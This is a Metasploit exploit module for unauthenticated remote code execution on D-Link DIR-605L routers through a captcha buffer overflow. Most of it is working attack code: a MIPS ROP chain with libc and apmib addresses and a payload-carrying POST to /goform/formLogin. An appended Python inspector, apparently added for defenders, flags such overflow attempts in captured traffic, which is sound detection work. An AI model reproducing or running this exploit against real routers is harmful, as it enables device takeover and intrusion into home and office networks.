##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # Because it has only been tested on a QEMU emulated environment

  HttpFingerprint = { :pattern => [ /Boa/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DIR-605L Captcha Handling Buffer Overflow',
      'Description'    => %q{
          This module exploits an anonymous remote code execution on D-Link DIR-605L
        routers. The vulnerability exists while handling user supplied captcha
        information, and is due to the insecure usage of sprintf on the getAuthCode()
        function. This module has been tested successfully on DLink DIR-605L Firmware
        1.13 under a QEMU environment.
      },
      'Author'         =>
        [
          'Craig Heffner', # Vulnerability discovery, original exploit
          'juan vazquez'   # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 3000,
          'BadChars'    => "\x00\x67\x26\x2b"
        },
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          [ 'OSVDB', '86824' ],
          [ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ]
        ],
      'Targets'        =>
        [
          [ 'DLink DIR-605L 1.13',
            {
              'Offset'      => 94,
              'LibcBase'    => 0x2ab86000, # According to Original Exploit by Craig Heffner
              'ApmibBase'   => 0x2aaef000, # According to Original Exploit by Craig Heffner
              #'LibcBase'    => 0x4212e000, # QEMU environment
              #'ApmibBase'   => 0x42095000, # QEMU environment
              # LOAD:000248D4  li    $a0, 1     ; set $a0 for the sleep() call
              # LOAD:000248D8  move  $t9, $s1   ; $s1 is controlled after the overflow
              # LOAD:000248DC  jalr  $t9
              'Ret'         => 0x248D4, # from libc
              # LOAD:0002B954  move  $t9, $s2               # Controlled
              # LOAD:0002B958  lw    $ra, 0x30+var_4($sp)   # allows to get controlled $ra from the stack
              # LOAD:0002B95C  lw    $s4, 0x30+var_8($sp)
              # LOAD:0002B960  lw    $s3, 0x30+var_C($sp)
              # LOAD:0002B964  lw    $s2, 0x30+var_10($sp)
              # LOAD:0002B968  lw    $s1, 0x30+var_14($sp)  # allows to get controlled $s1 from the stack
              # LOAD:0002B96C  lw    $s0, 0x30+var_18($sp)
              # LOAD:0002B970  jr    $t9
              'RopJmpSleep' => 0x2B954, # from libc
              'RopSleep'    => 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache
              # LOAD:000027E8  move  $t9, $s1               # Controlled
              # LOAD:000027EC  jalr  $t9 ; sub_22D0
              # LOAD:000027F0  addiu $a2, $sp, 0x40+var_24  ; put pointer to the stack on $a2 # executed because of pipelining
              'RopPtrStack' => 0x027E8, # from apmi
              # LOAD:00001D78  move  $t9, $a2   ; $a2 contains a pointer to the stack
              # LOAD:00001D7C  jalr  $t9
              'RopJmpStack' => 0x01D78 # from apmi
            }
          ]
        ],
      'DisclosureDate' => 'Oct 08 2012',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi({ 'uri' => '/comm.asp' })

    if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    shellcode = ""
    shellcode << rand_text(target['Offset'])                              # Padding
    shellcode << rand_text(4)                                             # $s0
    shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N")   # $s1
    shellcode << [target['LibcBase'] + target['RopSleep']].pack("N")      # $s2
    shellcode << rand_text(4)                                             # $s3
    shellcode << [target['LibcBase'] + target.ret].pack("N")              # $ra
    shellcode << rand_text(0x1c)                                          # filler
    shellcode << rand_text(4)                                             # $s0
    shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N")  # $s1
    shellcode << rand_text(4)                                             # $s2
    shellcode << rand_text(4)                                             # $s3
    shellcode << rand_text(4)                                             # $s4
    shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N")  # $ra
    shellcode << rand_text(0x1c)                                          # filler
    shellcode << payload.encoded                                          # shellcode

    print_status("#{peer} - Sending exploit...")

    send_request_cgi({
      'method'        => 'POST',
      'uri'           => "/goform/formLogin",
      'encode_params' => false,
      'vars_post'     => {
        'VERIFICATION_CODE' => 'myvoiceismypassportverifyme',
        'VER_CODE'          => '1234',
        'login_n'           => 'admin',
        'FILECODE'          => shellcode,
        'curTime'           => '1348588030496',
        'login_pass'        => 'Zm9vb255b3UA',
        'login_name'        => 'admin'
      }
    })
  end
end
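The module above overflows the stack once the FILECODE form field exceeds the 94-byte 'Offset' of the target. As an added example (not part of the module or of Metasploit), the following request inspector shows how a defender could flag such attempts in captured HTTP traffic to the router's login handler; the two sample requests and the 192.0.2.1 address are constructed for the self-test.

```python
import re
from urllib.parse import parse_qs

# A legitimate captcha value is a short printable string; anything past the
# 94-byte offset the module targets, or containing raw address/payload bytes,
# is a strong indicator of an overflow attempt against /goform/formLogin.
FILECODE_OFFSET = 94  # 'Offset' from the module's target definition
TARGET_URI = "/goform/formLogin"


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, uri, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower()] = v.strip()
    return method.decode(), uri.decode(), headers, body


def inspect_login_post(raw: bytes):
    """Return findings for one captured request; an empty list means nothing suspicious."""
    method, uri, _, body = parse_http_request(raw)
    if method != "POST" or uri != TARGET_URI:
        return []
    # latin-1 keeps every raw byte; keep_blank_values so an empty FILECODE still appears
    params = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    findings = []
    for value in params.get("FILECODE", []):
        if len(value) > FILECODE_OFFSET:
            findings.append(f"FILECODE length {len(value)} exceeds {FILECODE_OFFSET}-byte buffer")
        if re.search(r"[^\x20-\x7e]", value):
            findings.append("FILECODE contains non-printable bytes (addresses or payload)")
    return findings


# Constructed sample requests for the self-test (not real captures).
BENIGN = (b"POST /goform/formLogin HTTP/1.1\r\nHost: 192.0.2.1\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          b"VERIFICATION_CODE=abcd&VER_CODE=1234&login_n=admin&FILECODE=abcd&login_name=admin")
SUSPICIOUS = (b"POST /goform/formLogin HTTP/1.1\r\nHost: 192.0.2.1\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              b"VERIFICATION_CODE=x&FILECODE=" + b"A" * 94 + b"BBBB\xde\xad\xbe\xef&login_name=admin")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_login_post(req) or "clean")
```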